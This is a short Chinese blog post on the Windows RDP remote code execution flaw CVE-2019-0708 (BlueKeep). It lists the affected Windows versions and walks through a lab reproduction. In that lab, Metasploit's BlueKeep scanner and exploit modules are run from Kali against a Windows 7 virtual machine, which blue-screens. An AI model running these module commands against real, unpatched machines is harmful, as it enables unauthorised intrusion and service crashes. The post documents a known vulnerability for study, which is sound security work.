(CVE-2019-0708)Windows远程桌面代码执行漏洞

一.漏洞介绍

2019年5月15日,阿里云云盾应急响应中心监测到微软官方发布紧急安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),利用此漏洞可以直接获取Windows服务器权限。

该漏洞影响了某些旧版本的Windows系统,该漏洞为预身份验证,无需用户交互,当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特质请求时,可以在目标系统上执行任意命令,甚至传播恶意蠕虫,感染内网其他机器,获取敏感信息,执行远程代码,发起DOS攻击等,类似于2017年的WannaCry蠕虫病毒

二.漏洞影响

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

三.复现过程

环境:kali(192.168.188.128)

win7(192.168.188.156)

1.进入kali的msf中,查找0708

命令:search 0708

2.使用扫描模块,并更改配置

命令:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

可以看到只需要更改ip即可(需要更改为win7的ip)

命令:set RHOSTS 192.168.188.156

可以看到,检测出The Target is vulnerable,目标很脆弱,说明存在漏洞

接下来使用利用模块

命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

这里提示未配置payload,因此上图连同payload配置了

设置参数

命令:show options

set RHOSTS 192.168.188.156

运行

没有返回session,但是打开win7看到

被蓝屏警告

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容